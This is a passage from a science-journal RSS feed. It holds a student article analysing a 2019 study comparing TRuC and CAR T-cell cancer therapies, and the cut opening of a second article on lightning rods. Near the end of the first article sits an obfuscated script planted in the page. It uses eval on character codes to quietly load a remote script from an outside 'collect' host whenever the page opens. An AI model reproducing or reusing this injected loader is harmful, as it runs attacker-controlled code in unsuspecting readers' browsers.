<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-60.png" alt="" class="wp-image-1312" width="598" height="330" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-60.png 856w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-60-300x165.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-60-768x423.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-60-230x127.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-60-350x193.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-60-480x265.png 480w" sizes="(max-width: 598px) 100vw, 598px" /><figcaption><meta charset="utf-8">Figure 1d Quantification of TRuCs and CARs in two donors (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>Consistent with FACS analysis, ε-TRuC and BBζ CAR have the highest F(ab’)2 mean fluorescent intensity compared with other signaling units. However, a big difference in MFI occurs in two individual donors despite the fact that both of them are inserted into the same T cell receptor. This means that there are discrepancies between individuals, so TRuCs and CARs will have different expression levels in different individuals. Another point worth noting is the vector control in this graph: without the scFv units fused to the TRuC or CAR, the F(ab’)2 MFI are still in a high amount, which reveals that the signaling units TCRα, TCRβ, CD3γ, CD3δ may not be helpful to enhance the mean fluorescent intensity. Additionally, the scale of the data is a bit unclear because there are far more numbers between 1000 and 10000 than that between 10 and 100. It is inappropriate to put them together as causing confusion.</p>



<h2 class="wp-block-heading"><strong>TCR composition</strong></h2>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="288" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-61.png" alt="" class="wp-image-1313" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-61.png 624w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-61-300x138.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-61-230x106.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-61-350x162.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-61-480x222.png 480w" sizes="(max-width: 624px) 100vw, 624px" /><figcaption><meta charset="utf-8">Figure 2a TCR complexes with incorporation of TRuC (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>After the incorporation of TRuCs, cells were lysed and TCR complexes were separated by Blue native PAGE. They were stained using an anti-CD3ζ antibody. “0” denotes the natural TCR complex, “1” and “2” denote TCR complexes with one or two TRuCs, respectively (Baeuerle<em>, </em>2019). Blue native PAGE is a technique used for isolation of protein complexes and measurement of native protein masses without protein complex denaturation. In Figure 2a, the y-axis represents the measure of molecular weight or mass in kDa (kilodalton). Some are natural T cell receptor, while others are engineered TRuC receptor. The minimum mass of protein of natural TCR complex is 440 kDa. There is a direct correlation between the quantity of protein and how dark it is. According to the extent of stain darkness, the TCR complex with two α-TRuCs has the highest molecular mass with protein complexes measuring 660 kDa. Following close are TCR complexes with ε-TRuCs and β-TRuCs. Interestingly, natural vector control has a higher amount of protein than the cell with δ-TRuCs.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="732" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-62-1024x732.png" alt="" class="wp-image-1314" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-62-1024x732.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-62-300x214.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-62-768x549.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-62-920x657.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-62-230x164.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-62-350x250.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-62-480x343.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-62.png 1254w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 2b complex formation of TRuC variants (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>Researchers then used immunoprecipitation to show the amount of individual TRuC proteins in TCRs. “They were immunopurified using the anti-F(ab’)2 antibody, and then separated by reducing SDS-PAGE. (Co)-purified proteins were detected using the described antibodies by western blot” (Baeuerle<em>, </em>2019). Different from figure 2a, TRuC variants here have similar amounts of protein and use different specific antibodies. For α-TRuC, they use corresponding anti-TCRα to show its molecular size 95 kDa. For β-TRuC, they use anti-TCRβ and identify its size as 80 kDa. For 28ζ and BBζ CAR-T cells, they both use anti-CD3ζ to show it size at 72 kDa. The overall result is that each TRuC and CAR shows its expected molecular size. &nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="796" height="352" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-63.png" alt="" class="wp-image-1315" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-63.png 796w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-63-300x133.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-63-768x340.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-63-230x102.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-63-350x155.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-63-480x212.png 480w" sizes="(max-width: 796px) 100vw, 796px" /><figcaption><meta charset="utf-8">Figure 2c T cells co-cultured with antigen-presenting cells (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>What researchers do next is to test the function of the T-cell receptor, which determines their sensitivity to different amounts of peptides. The higher mean fluorescent intensity it has, the more sensitive the T cell is. If TRuC or CAR T cells are too sensitive, they will be activated without any stimulation and be always on, which will finally lead to the self-destruction of the T cell. As shown in figure 2c, the MFI increases as the H-A peptide amount increases, indicating that they are becoming more active. It is worth noting that both of the CARs are easily activated, probably due to its strong tonic signaling. Also, the ε-TRuC exhibits equal mean fluorescent intensity with the vector control, meaning that TRuCs do not interfere with normal TCR function, while CARs impair a lot through increasing sensitivity.</p>



<h2 class="wp-block-heading"><strong>TCR efficacy <em>in vitro</em></strong> &nbsp;</h2>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="876" height="534" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-64.png" alt="" class="wp-image-1316" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-64.png 876w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-64-300x183.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-64-768x468.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-64-230x140.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-64-350x213.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-64-480x293.png 480w" sizes="(max-width: 876px) 100vw, 876px" /><figcaption><meta charset="utf-8">Figure 3a tumor cell lysis of luciferase-expressing Nalm6 tumor cells (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>To test the TRuC and CAR efficacy, researchers use two approaches: one was by percent lysis of luciferase-expressing Nalm6 cells after 24 h; the other was by means of an impedance-based assay using CD19-expressing HeLa cells to study the kinetics of cell lysis (Baeuerle<em>, </em>2019). Luciferase is a bioluminescent enzyme, which in this case serves as reporter of successful lysis. Fig. 3a represents the tumor cell lysis of luciferase-expressing Nalm6 cells. The three blue dots are the biological replicates and means of the lysis percent. Error bars are also included in the graph. It is easy to see that there are stark differences in the lysis percent between vector control and two TCRs. The vector control only lyses about ten percent of tumor cells, while the most effective TCR, BBζ CAR-T cells, exhibits 65% tumor cell lysis. Among the TRuCs, the ε-TRuC demonstrates the highest tumor cell lysis, with 60% cell lysis. α-TRuC’s efficacy in tumor cell lysis is less robust than the other TRuC subunits, with 25% lysis.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="788" height="500" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-65.png" alt="" class="wp-image-1317" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-65.png 788w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-65-300x190.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-65-768x487.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-65-230x146.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-65-350x222.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-65-480x305.png 480w" sizes="(max-width: 788px) 100vw, 788px" /><figcaption><meta charset="utf-8">Figure 3b Kinetics of lysis of HeLa cells expressing a truncated form CD19 (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>As mentioned in the previous paragraph, this is the other approach that uses CD19-expressing HeLa cells to study cell lysis. HeLa cells are tumor cells, which are represented on the y-axis as normalized cells. After T cells were added, the tumor cell index decreased quickly and finally declined to zero after 120 hours. The fact that normalized cell index increased for vector control and cells without T cells insertion demonstrates the effectiveness of TRuC and CAR to lyse tumor cells. Among all TCRs, the most efficacious was BBζ CAR-T cells, in accordance with the result in tumor cell lysis using luciferase. The one with slowest rate of decreasing normalized cell index was β-TRuC.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="214" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-66-1024x214.png" alt="" class="wp-image-1318" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-1024x214.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-300x63.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-768x160.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-1536x321.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-2048x428.png 2048w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-920x192.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-230x48.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-350x73.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-66-480x100.png 480w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 3c donor variability in tumor cell killing (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>Researchers selected three TCRs, ε-TRuC, 28ζ CAR, BBζ CAR, to examine the donor variability in tumor cell killing. It is clearly shown in fig.3c that donor variability only slightly affected the efficacy of TCRs in decreasing normalized cell index. All three patients’ normalized cell index successfully declined to zero after 120 hours. The cytokine release after the T cell adding and treatment is discussed in the next part.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="205" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-67-1024x205.png" alt="" class="wp-image-1319" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-1024x205.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-300x60.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-768x154.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-1536x307.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-2048x410.png 2048w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-920x184.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-230x46.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-350x70.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-67-480x96.png 480w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 3d induction of cytotoxic protein and cytokine production (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>Accompanied with T-cell treatment are cytokine production and secretion. One of the most harmful side effects of CAR-T cells is the cytokine release syndrome (CRS), which is further illustrated in these graphs. Compared with TRuCs, CARs release far more IL-2, IFNγ, IL-4, IL-13, and TNFα cytokines. Specifically for IL-2, when no TCRs are added, no cytokine release was observed. After the incorporation of γ-TRuC and ε-TRuC, there are approximately 4000 to 5000 pg IL-2 release, while after 28ζ CAR was inserted into the cell, the cytokine release was about 22000 pg. Thus, smaller amount of cytokine release is one of the advantages TRuC receptors have over CAR-T cell receptors, which prevents patients from suffering from neurotoxicity and other diseases.</p>



<h2 class="wp-block-heading"><strong>TCR activation and signaling</strong></h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="273" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-68-1024x273.png" alt="" class="wp-image-1320" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-68-1024x273.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-68-300x80.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-68-768x205.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-68-920x246.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-68-230x61.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-68-350x93.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-68-480x128.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-68.png 1393w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 4a the percentage of CD69/CD25 positive cells (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>The researchers then investigated on the activation of T-cell receptors by quantifying the amounts of CD69<sup>+</sup> and CD25<sup>+ </sup>using FACS. The distribution of these two positive cell surface molecules, shown in fig. 4a, corresponds to the percentages of T-cell activation. ε-TRuC had the most significant amount of signaling among all TRuCs, displaying similar activation levels to BBζ CAR. Both ε-TRuC and BBζ CAR had 65% of CD69<sup>+</sup> and CD25<sup>+</sup> signaling, while that of α, β, δ-TRuC were much lower, exhibiting activation between 20 to 30%. Overall, both TRuCs and CARs showed less expression of CD69<sup>+</sup> upon activation, but comparatively higher expression of CD25<sup>+</sup>, possibly due to their different TCR units.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1004" height="381" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-69.png" alt="" class="wp-image-1321" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-69.png 1004w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-69-300x114.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-69-768x291.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-69-920x349.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-69-230x87.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-69-350x133.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-69-480x182.png 480w" sizes="(max-width: 1004px) 100vw, 1004px" /><figcaption><meta charset="utf-8">Figure 4b phosphorylation of CD3ε and LAT (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>Researchers then looked for the phosphorylation of intracellular signaling proteins and found that both CAR-T and TRuC-T cells induce intracellular signaling protein phosphorylation, but to different extents. They co-cultured T cells with CD19+ Raji cells at a 10:1 effector-to-target ratio for 30 min (Baeuerle<em>, </em>2019). The phosphorylation of intracellular signaling proteins upon activation induced a change in charge, in turn causing a conformational change. The y-axis represents mean fluorescent intensity, which was used for detecting the amount of signaling per cell. For phosphorylation of CD3ε, the TRuCs displayed more than double the phosphorylation than the CARs. While for phosphorylation of LAT (Linker for activation of T cells) was an order of magnitude lesser, the signaling of TRuCs and CARs was measured and indicated that intercellular signaling is activated in both TRuCs and CARs upon stimulation.</p>



<figure class="wp-block-image"><img decoding="async" src="blob:https://www.exploratiojournal.com/1c7263df-d644-4a70-9f09-ab24ad15f694" alt=""/><figcaption><meta charset="utf-8">Figure 4c five days after phosphorylation of CD3ζ (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>Using FACS again, the graph shows T cells in GFP and phosphor-CD3ζ after 5 days expansion in the presence of IL-2 and anti-CD3/anti-CD28-coupled Dynabeads (Baeuerle<em>, </em>2019). ε-TRuC had low levels of activated phosphor-CD3ζ, while the two CARs had slightly higher activation, while all their GFP amounts displayed 46.7%. In summary, TRuC-T cells and CAR-T cells had differing intracellular activation and signaling events.&nbsp;</p>



<h2 class="wp-block-heading"><strong>TCR efficacy in vivo</strong></h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="502" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-71-1024x502.png" alt="" class="wp-image-1323" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-71-1024x502.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-71-300x147.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-71-768x376.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-71-1536x753.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-71-920x451.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-71-230x113.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-71-350x171.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-71-480x235.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-71.png 1888w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 5a Raji-LUC tumor growth of mice (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>To test the anti-tumor activity of TCRs in liquid tumor model, researchers subcutaneously inoculated lymphoma and leukemia cells into mice. After the tumor cells began to grow in mice, they injected them with TRuC-T cells and CAR-T cells to treat them and test the efficacy of killing tumor cells. There was also a group of non-transduced mice used as a negative control. In NT group, the tumor volume increased in an exponential way: it nearly quadrupled after 20 days and kept increasing as the study progressed. However, the situation turned way much better when T cells were present. For ε-TRuC, when 1×10<sup>8</sup> T cells were injected, the tumor volume kept close to zero and no tumor could be detected at the end of the study. While when 1×10<sup>8</sup> CAR-T cells were injected into the mice, the tumor volume increased slowly. Thus, TRuC-T cells are more effective than CAR-T cells at killing tumor cells <em>in vivo</em>. Another advantage TRuC-T cells displayed was that the survival rates of mice after injecting them were almost 100%, while 20 to 30% of mice injected with CARs die after 20-30 days, highlighting the cytotoxic effects of CAR-T cell therapies. Also, as the number of injected T cells was decreased, the effectiveness of tumor cell elimination decreased as well: when 5×10<sup>4</sup> T cells were injected, neither TRuC nor CAR could reduce the tumor volume over 40 days.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="221" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-72-1024x221.png" alt="" class="wp-image-1324" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-1024x221.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-300x65.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-768x166.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-1536x331.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-2048x442.png 2048w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-920x198.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-230x50.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-350x75.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-72-480x103.png 480w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 5b bioluminescence imaging of tumor cells growth (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>Immunocompromised NSG mice were injected with 5 × 10<sup>5</sup> Raji-LUC cells into the tail vein of mice 5 days prior to treatment with 1 × 10<sup>7</sup> non-transduced or engineered T cells (Baeuerle<em>, </em>2019). For ε-TRuC, the luminescence rose, then decreased, and finally stayed constant, corresponding with its tumor volume in fig. 5a. The two CAR-T cells’ luminescence increases more than with TRuC: although it decreased at first, it then relapsed quickly, meaning that the tumor grew post treatment in CAR-treated mice.&nbsp;</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-73.png" alt="" class="wp-image-1325" width="402" height="322" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-73.png 652w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-73-300x241.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-73-230x184.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-73-350x281.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-73-480x385.png 480w" sizes="(max-width: 402px) 100vw, 402px" /><figcaption><meta charset="utf-8">Figure 6a lysis of HeLa cells (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>In the end, researchers wanted to investigate the effectiveness of TRuC-T cells against solid tumor models. They focused on specific domain for BCMA (B cell maturation antigen) and IL13Rα2 (interleukin-13 receptor α2). As shown in fig. 6a, almost 100% of tumor cells are lysed and the tumor growth is inhibited no matter what kind of TRuC was fused with BCMA. For HeLa-CD19, the TRuCs had a low effect in tumor cell lysis, having small difference with the vector control.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-74.png" alt="" class="wp-image-1326" width="431" height="302" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-74.png 680w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-74-300x210.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-74-230x161.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-74-350x246.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-74-480x337.png 480w" sizes="(max-width: 431px) 100vw, 431px" /><figcaption><meta charset="utf-8">Figure 6b anti-tumor activity of RMPI 8226 (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>RMPI 8226 is another multiple myeloma cell line, which is used here to test its anti-tumor activity. ε-TRuC, γ-TRuC, and β-TRuC successfully reduced tumor volume to zero after 40 days. However, the experiment cannot assure that the tumor may relapse after these 40 days.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-75.png" alt="" class="wp-image-1327" width="419" height="290" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-75.png 616w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-75-300x207.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-75-230x159.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-75-350x242.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-75-480x332.png 480w" sizes="(max-width: 419px) 100vw, 419px" /><figcaption><meta charset="utf-8">Figure 6c lysis of U251 glioblastoma cells (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>Researchers lysed U251 glioblastoma cells using IL-13Rα2-specific ε-TRuC-T cells at various effector-to-target ratios. When the effector-to-target ratio was larger, the percentage of tumor lysis tended to increase. In fig.6a, the effector-to-target ratio was 1:1 and had near 100% tumor cell lysis. By contrast, when the ratio was 1:1 in IL-13Rα2, the tumor cell lysis was only 35%. This shows that IL-13Rα2-specific TRuC cells are less efficient than BCMA TRuC cells in inducing tumor cell lysis, despite having similar effects on tumor growth.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-76-1024x382.png" alt="" class="wp-image-1328" width="649" height="242" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-76-1024x382.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-76-300x112.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-76-768x287.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-76-920x343.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-76-230x86.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-76-350x131.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-76-480x179.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-76.png 1200w" sizes="(max-width: 649px) 100vw, 649px" /><figcaption><meta charset="utf-8">Figure 6d cytotoxicity and relapse</figcaption></figure>



<p>As TRuC-T cells were shown to have efficacious tumor cell lysis effects and anti-tumor activity, they also released cytokines IL-2 and IFN- γ. Comparatively, the cytokine IFN- γ was released at higher levels than that of IL-2, about 20 times, but the unit is pg/mL, so the amount was actually lower than that released by CAR-T cells. The question of relapse is answered in the graph on the right: after 40 days, the tumor volume kept constant at zero and the trend suggested that their effects would be continual rather than only for a period of days,</p>



<h2 class="wp-block-heading"><strong>Conclusion</strong></h2>



<p>TRuC-T cells are a generation of more effective CAR-T cell therapies that use fusion constructs to incorporate anti-CD19 into functional T cell receptors, as opposed to using chimeric T cell receptors. They are effective <em>in vitro</em>, as well as <em>in vivo</em> towards both liquid and solid tumors. TRuCs induce roughly half the amount of cytokine release compared to CAR-T cells and present a new generation of engineered T-cell receptor anti-cancer therapies, with promising efficacy and a lower risk of cytokine release syndrome (CRS). The research on TRuC-T cells plays a significant role in exploring current ways to combat cancer diseases improving people’s health all over the globe.</p>



<h2 class="wp-block-heading">Bibliography</h2>



<p>“Cancer Statistics.” <em>National Cancer Institute</em>, <a href="http://www.cancer.gov/about-cancer/understanding/statistics">www.cancer.gov/about-cancer/understanding/statistics</a>.</p>



<p>Baeuerle, Patrick A., et al. &#8220;Synthetic TRuC receptors engaging the complete T cell receptor for potent anti-tumor response.&#8221;&nbsp;<em>Nature communications</em>&nbsp;10.1 (2019): 1-12.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Yicheng (Ethan) Ding</h5><p>Yicheng is strongly interested in biology, especially molecular biology related to human bodies, such as proteins, DNA, and tumors. This inspiration is obtained partly due to the COVID-19 pandemic, which raises our concern and his want to improve human disease treatments. In his spare time, Ethan usually plays table tennis and plays basketball with friends, as well as watching TV programs such as the Big Bang theory.

</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/the-effect-of-t-cell-receptors-on-cancer-therapy/">The effect of T-cell receptors on cancer therapy</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>How do lightning rods work?</title>
		<link>https://exploratiojournal.com/how-do-lightning-rods-work/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=how-do-lightning-rods-work</link>
		
		<dc:creator><![CDATA[Winnie Shi]]></dc:creator>
		<pubDate>Wed, 20 Oct 2021 15:02:48 +0000</pubDate>
				<category><![CDATA[Physics]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[computer science]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[Science]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1269</guid>

					<description><![CDATA[<p>Winnie Shi<br />
Shanghai Starriver Bilingual School</p>
<p>The post <a href="https://exploratiojournal.com/how-do-lightning-rods-work/">How do lightning rods work?</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: <strong>Winnie Shi</strong></strong><br><strong>Mentor</strong>: <strong>Dr. De La Torre</strong>, <strong>Caltech</strong><br><em>Shanghai Starriver Bilingual School<br></em>October 1, 2021</p>
</div></div>



<h2 class="wp-block-heading">1.Introduction</h2>



